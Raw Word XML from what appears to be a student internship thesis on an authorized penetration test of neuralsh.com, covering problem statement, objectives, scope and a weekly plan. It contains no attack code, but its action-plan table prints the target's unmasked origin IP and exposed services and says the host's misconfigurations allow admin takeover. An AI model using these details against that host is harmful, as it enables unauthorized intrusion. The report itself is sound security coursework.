        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Over the past several years, cybercrime has escalated at a pace that has outstripped the security readiness of many organizations worldwide. What was once considered a concern limited to large enterprises has become a daily reality for businesses of every size. The numbers tell a stark story.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>According to the Verizon 2025 Data Breach Investigations Report, web application attacks accounted for over 43% of all recorded data breaches globally — making them the single largest attack vector for the third consecutive year. The average cost of a data breach reached USD 4.88 million in 2024, a figure that continues to climb. Ransomware attacks surged by 37% year-over-year, with Southeast Asian targets increasingly appearing in threat intelligence reports from Mandiant and CrowdStrike.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>By 2026, the threat landscape has grown more sophisticated. Attackers are now using artificial intelligence to automate reconnaissance, generate tailored phishing content, and discover misconfigurations at scale — dramatically reducing the time between vulnerability publication and active exploitation. The Cybersecurity and Infrastructure Security Agency (CISA) reported in early 2026 that the average time from vulnerability disclosure to exploitation in the wild had dropped to under 48 hours for critical findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In the Southeast Asian region, the situation is particularly pressing. Cambodia, along with neighboring countries, has experienced a sharp rise in targeted attacks against small and medium-sized technology companies. Many of these businesses have embraced rapid digital growth without a corresponding investment in security fundamentals. Web applications are deployed with default configurations, administrative panels left exposed on the public internet, and authentication systems built without rate limiting or input validation — the exact conditions that make exploitation trivially easy for even low-skilled attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship directly addressed one such environment. The target system, neuralsh.com, exhibited multiple critical misconfigurations that, if left unaddressed, would have allowed an unauthenticated attacker to gain administrative control over the entire hosting infrastructure within minutes of discovering the origin IP address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The internship objective is guided by the advisor and supervisor at Prestige Alliance Co., Ltd. to identify, analyze, and address system weaknesses and vulnerabilities in neuralsh.com. The process followed the agreement of the penetration tester and stakeholder before performing the penetration testing. For this internship, the following objectives were accomplished:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Perform vulnerability scanning on the external web application neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Analyze the vulnerabilities, weaknesses, and propose solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Set up the testing environment and select the appropriate tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Perform penetration testing on the authorized target system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Perform exploitation on misconfigured systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Analyze post-exploitation lateral movement risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create an official VAPT report for the stakeholder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Produce remediation recommendations for all identified vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Publish the finalized thesis document for academic submission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. Solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The core approach to addressing the security weaknesses identified in this project was to treat every vulnerability not as an isolated finding, but as part of a broader picture of the target's overall security posture. Rather than simply listing what was broken, the methodology aimed to understand how vulnerabilities connect — how one misconfiguration could be chained with another to produce an outcome far more severe than either finding alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To find the weakness of the systems, penetration testing was performed following the OWASP TOP 10 framework as a baseline. For each finding, the following solution path was applied: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Identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerability through active testing and passive reconnaissance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Validate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> it with a controlled proof-of-concept to confirm exploitability</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Score</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> it using CVSS v3.1 to communicate risk objectively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Recommend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a specific, actionable remediation step tailored to the technology stack in use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The official penetration testing report produced at the end of this engagement documents all findings in a format designed to help the stakeholder understand both the technical detail and the business impact — making it straightforward to prioritize and act on remediation without requiring deep security expertise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5. Project Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship engagement focused on the external attack surface of neuralsh.com and its underlying hosting infrastructure, authorized in writing by Prestige Alliance Co., Ltd. Testing was conducted using a black-box approach — meaning no credentials, source code, or internal documentation were provided prior to testing. Everything discovered was derived from publicly accessible systems and open-source intelligence, simulating the real-world perspective of an external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The table below defines the systems that were in scope for this engagement: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Asset</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Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Primary target — Nuxt.js frontend, protected by Cloudflare WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*.neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Subdomains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>All subdomains discoverable via DNS enumeration or certificate transparency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>mail.neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Origin server entry point — resolves directly to 103.16.xx.xxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Origin Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Backend infrastructure hosting the application, database, mail stack, and admin panels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 1: Engagement scope — in-scope systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The following were explicitly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>out of scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: third-party services not owned by the target (including Cloudflare's own infrastructure), physical access testing, social engineering, denial of service attacks, and any IP address not belonging to the target organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This engagement was authorized by Prestige Alliance Co., Ltd. for the period of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>June 2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, aligned with the academic thesis submission schedule. All findings are treated as confidential and disclosed exclusively to Prestige Alliance Co., Ltd. and the supervising academic institution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Action Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To make the internship progress go as planned, the activities below were organized into a weekly timeline spanning the full engagement period. The plan covers two periods: February to March (vulnerability assessment and lab training) and April to May (production penetration testing, report creation, and remediation).</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4472C4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>February</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>March</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4472C4"/>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C000"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8210"/>
            <w:gridSpan w:val="9"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Environment Setup &amp; Scope Definition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Set up Kali Linux testing environment and tools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Define engagement scope with Prestige Alliance Co., Ltd.</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Obtain written authorization for neuralsh.com testing</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8210"/>
            <w:gridSpan w:val="9"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance &amp; Intelligence Gathering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WHOIS analysis and DNS enumeration (A, MX, TXT, NS records)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Discover real origin IP via MX record and SSL certificate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Subdomain enumeration and wildcard DNS detection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JavaScript bundle analysis to extract API routes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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8210"/>
            <w:gridSpan w:val="9"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Active Scanning &amp; Enumeration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Nmap port scan on origin server (103.16.62.217)</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Web directory enumeration with Dirb and Nikto</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Service fingerprinting — MySQL, SMTP, MikroTik, WHM</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2: Action plan from February to March</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397"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ED7D31"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>April</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99CC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>May</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1247" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="397"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pP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1</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2</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="601"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ED7D31"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Week 4</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1</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2</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="601"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99CC"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Week 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="397"/>
